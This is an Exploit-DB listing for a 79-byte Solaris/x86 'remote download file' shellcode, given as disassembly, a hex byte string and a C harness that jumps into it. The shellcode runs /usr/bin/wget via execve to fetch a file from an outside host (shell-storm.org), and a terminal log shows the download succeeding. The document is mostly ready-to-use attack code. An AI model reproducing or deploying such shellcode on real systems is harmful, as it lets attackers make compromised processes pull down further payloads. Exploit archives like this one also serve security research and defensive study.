Solaris/x86 - Remote Download file - 79 bytes

2010-05-25T00:00:00
ID EDB-ID:13711
Type exploitdb
Reporter Jonathan Salwan
Modified 2010-05-25T00:00:00

Description

Solaris/x86 - Remote Download file - 79 bytes. Shellcode exploit for solaris_x86 platform

                                        
                                            /*
Title:   Solaris/x86 - Remote Download file - 79 bytes 
Author:  Jonathan Salwan <submit [!] shell-storm.org>
Web:     http://www.shell-storm.org
Twitter: http://twitter.com/jonathansalwan	

!Database of Shellcodes http://www.shell-storm.org/shellcode/

Date:	 2010-05-25
Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris


section .text
    0x8048074:              31 d2              xorl   %edx,%edx
    0x8048076:              52                 pushl  %edx
    0x8048077:              6a 73              pushl  $0x73
    0x8048079:              66 68 72 69        pushw  $0x6972
    0x804807d:              68 73 6f 6c 61     pushl  $0x616c6f73
    0x8048082:              68 70 6c 65 2d     pushl  $0x2d656c70
    0x8048087:              68 65 78 65 6d     pushl  $0x6d657865
    0x804808c:              68 6f 72 67 2f     pushl  $0x2f67726f
    0x8048091:              68 6f 72 6d 2e     pushl  $0x2e6d726f
    0x8048096:              68 6c 2d 73 74     pushl  $0x74732d6c
    0x804809b:              68 73 68 65 6c     pushl  $0x6c656873
    0x80480a0:              89 e1              movl   %esp,%ecx
    0x80480a2:              52                 pushl  %edx
    0x80480a3:              6a 74              pushl  $0x74
    0x80480a5:              68 2f 77 67 65     pushl  $0x6567772f
    0x80480aa:              68 2f 62 69 6e     pushl  $0x6e69622f
    0x80480af:              68 2f 75 73 72     pushl  $0x7273752f
    0x80480b4:              89 e3              movl   %esp,%ebx
    0x80480b6:              52                 pushl  %edx
    0x80480b7:              51                 pushl  %ecx
    0x80480b8:              53                 pushl  %ebx
    0x80480b9:              89 e1              movl   %esp,%ecx
    0x80480bb:              52                 pushl  %edx
    0x80480bc:              51                 pushl  %ecx
    0x80480bd:              53                 pushl  %ebx
    0x80480be:              b0 3b              movb   $0x3b,%al
    0x80480c0:              52                 pushl  %edx
    0x80480c1:              cd 91              int    $0x91


Exemple:
--------
 
 jonathan@opensolaris:~/shellcode/wget/C$ ls -l
 total 11
 -rwxr-xr-x 1 jonathan staff 8516 2010-05-25 13:33 remotedl-solaris
 -rw-r--r-- 1 jonathan staff  565 2010-05-25 13:33 remotedl-solaris.c
 jonathan@opensolaris:~/shellcode/wget/C$ ./remotedl-solaris 
 Length: 79
 --13:37:01--  http://shell-storm.org/exemple-solaris
            => `exemple-solaris'
 Resolving shell-storm.org... 82.243.29.135
 Connecting to shell-storm.org|82.243.29.135|:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 15 [text/plain]

 100%[=============================================>] 15            --.--K/s             

 13:37:01 (468.93 KB/s) - `exemple-solaris' saved [15/15]

 jonathan@opensolaris:~/shellcode/wget/C$ cat exemple-solaris 
 Hello Solaris.
 jonathan@opensolaris:~/shellcode/wget/C$

*/

#include <stdio.h>


char sc[] = "\x31\xd2\x52\x6a\x73\x66\x68\x72\x69\x68\x73\x6f"
            "\x6c\x61\x68\x70\x6c\x65\x2d\x68\x65\x78\x65\x6d"
            "\x68\x6f\x72\x67\x2f\x68\x6f\x72\x6d\x2e\x68\x6c"
            "\x2d\x73\x74\x68\x73\x68\x65\x6c\x89\xe1\x52\x6a"
            "\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68"
            "\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\x52"
            "\x51\x53\xb0\x3b\x52\xcd\x91";


int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(sc));
        (*(void(*)()) sc)();

return 0;
}